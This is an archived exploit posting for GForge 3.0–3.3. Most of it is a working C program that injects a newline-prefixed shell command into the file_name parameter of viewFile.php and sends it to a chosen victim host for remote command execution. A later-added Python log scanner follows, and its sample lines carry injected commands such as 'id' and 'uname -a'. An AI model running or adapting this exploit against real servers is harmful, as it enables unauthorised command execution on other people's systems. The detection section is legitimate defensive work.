GForGE3x.c
Posted Apr 17, 2005
Authored by Lion | Site bastardsoperatorsfromhell.org

GForge 3.x remote command execution exploit that makes use of a flaw in the CVS modules.

tags | exploit, remote
SHA-256 | 3744f3a711daa6de0ebf219d09ae9702a6d0c963ed719af191c9abb3fb0d5ffa

Author: L|On
Homepage: http://www.bastardsoperatorsfromhell.org
Description: GForGE 3.x Remote Execute Command Exploit

GForge (www.gforge.org) is software that supports collaborative development
for software communities. It provides a fully configured development system
with tools for communication and version control among the members of a
development team on a web site. The GForge CVS modules have a remote command
execution vulnerability that can be exploited by malicious attackers.

Vulnerability Class: FileHandler.class
Affected versions: 3.0 - 3.3 (4.x not tested)

Files with the vulnerable code:
viewFile.php,v 1.1.1.1 2004/08/09 21:12:16
viewFile.php,v 1.4 2003/10/25 22:46:13

Proof of Concept ExPlOiT by L|On lion@avatarcorp.org :

/***********************************************************
* GFORGE 3.0 - 3.3 POF EXPLOIT ver. 1.0 *
* Remote System Code Execution *
* by L|On 06 Apr 2005 *
* lion@avatarcorp.org - www.bastardsoperatorsfromhell.org *
* Thank's to all brother on #BOFH.IT *
***********************************************************/


#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

#define MAX_SIZE 1
#define DEF_PATH "/scm/viewFile.php"
#define FALSE -1
#define TRUE 0

void usage_form(char *cmd){
fprintf(stderr,"\nGForGE 3.0 - 3.3 POF ExPlOiT by L|On 06 Apr 2005\n"
"lion@avatarcorp.org - www.bastardsoperatorsfromhell.org\n"
"-------------------------------------------------\n"
"Usage: %s -t <target> [-l <link_path>] [-c <cmd_send>] [-h]\n\n"
"target : victim_host\n"
"link_path : full path where locate bad php file (default: /scm/viewFile.php)\n"
"cmd_send : command to send victim to test bug\n\n", cmd);
exit(1);
}

int main(int argc, char *argv[])
{
int s, i = 0;
int testbug = FALSE;
struct sockaddr_in victem;
struct hostent *he;
char opt;
char location[50] = DEF_PATH;
char *evilcode;
char *target = NULL;
char *buffer;
char cgibuff[40000];
char *temp[MAX_SIZE + 2];
char *name[MAX_SIZE + 2];
char *get_html = "GET ";
char *host_html = "Host: ";

char *vcode={"\x3f\x67\x72\x6f\x75\x70\x5f\x69\x64\x3d\x35\x26"
"\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x25\x30"
"\x41"};

while((opt = getopt(argc, argv, "t:l:c:h")) != EOF){
switch(opt)
{
case 't':
target = optarg;
break;
case 'l':
location[0] = '\0';
strcat(location, optarg);
break;
case 'c':
testbug = TRUE;
evilcode = optarg;
break;
case 'h':
usage_form(argv[0]);
break;
}
}
if(target == NULL){
fprintf(stderr,"No target specified, try -h for help\n");
exit(1);
}

temp[1] = malloc(1000);

strcat(temp[1], vcode);
strcat(temp[1], evilcode);
strcat(temp[1], "%0a HTTP/1.0\n");


if ((he=gethostbyname(target)) == NULL) exit(printf("Error getting hostname"));

name[1] = "Send Evil Code...";

while(i++ < MAX_SIZE){
if((buffer = (char *) malloc (strlen(get_html) +
strlen(location) + strlen(temp[1]) + strlen(host_html) + strlen(target)
+ 1)) == NULL){
perror("(malloc buffer)");
exit(2);
}

strcat(buffer, get_html);
strcat(buffer, location);
strcat(buffer, temp[1]);
strcat(buffer, host_html);
strcat(buffer, target);
strcat(buffer, "\n");

if (testbug == TRUE) strcat(buffer, "\n");

printf("\n%s** %d\n\n", buffer, strlen(buffer));

s=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&victem.sin_addr, he->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);

if (connect(s, (struct sockaddr*)&victem, sizeof(victem))<0)
exit(printf("Connect error"));

cgibuff[0] = '\0';

fprintf(stderr,"%s...",name[1]);
send(s, buffer, strlen(buffer),0);

if (testbug == TRUE){
recv(s, cgibuff, sizeof(cgibuff),MSG_WAITALL); // MSG_WAITALL to receive the entire text
if(strlen(cgibuff) != 0) fprintf(stderr,"\n%s\n", cgibuff);
close(s);
exit(0);
}
printf("DONE\n");
close(s);
buffer[0] = '\0';

}
return 0;
}
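
For defenders, the request this exploit sends (viewFile.php with a file_name value that begins with an encoded newline, %0A) is easy to spot in web server access logs. The following is an added example, not part of the original advisory or of GForge: a Python scanner over combined-format log lines, where the sample log lines, the allowlist of file-name characters and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Quoted request field of a combined-format access log, followed by the status.
# The target is matched lazily so raw spaces inside it are tolerated.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>.+?)(?: HTTP/\d\.\d)?" (?P<status>\d{3}) ')
# Assumed allowlist for a repository file name; tighten it for your own tree.
ALLOWED_RE = re.compile(r'[A-Za-z0-9._/+-]*\Z')

def classify(value):
    """Return why a decoded file_name value is suspicious, or None."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return "control character"
    if not ALLOWED_RE.match(value):
        return "outside allowlist"
    return None

def scan(lines, script="viewFile.php"):
    """Return (line_no, status, reason, repr(value)) for each flagged request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        # Match on the script name: the exploit's -l option changes the prefix.
        if path.rsplit("/", 1)[-1] != script:
            continue
        for value in parse_qs(query, keep_blank_values=True).get("file_name", []):
            reason = classify(value)
            if reason:
                hits.append((no, int(m.group("status")), reason, repr(value)))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [06/Apr/2005:10:00:01 +0200] "GET /scm/viewFile.php?group_id=5&file_name=src/main.c HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Apr/2005:10:02:13 +0200] "GET /scm/viewFile.php?group_id=5&file_name=%0Aid%0a HTTP/1.0" 200 312',
    '198.51.100.7 - - [06/Apr/2005:10:02:40 +0200] "GET /gforge/scm/viewFile.php?group_id=5&file_name=%0Auname -a%0a HTTP/1.0" 200 298',
    '203.0.113.5 - - [06/Apr/2005:10:05:00 +0200] "GET /index.php?file_name=%0Aid HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A 200 status on a flagged line only means the script answered; confirm against the GForge version in use and the process activity on the host before treating it as a successful execution.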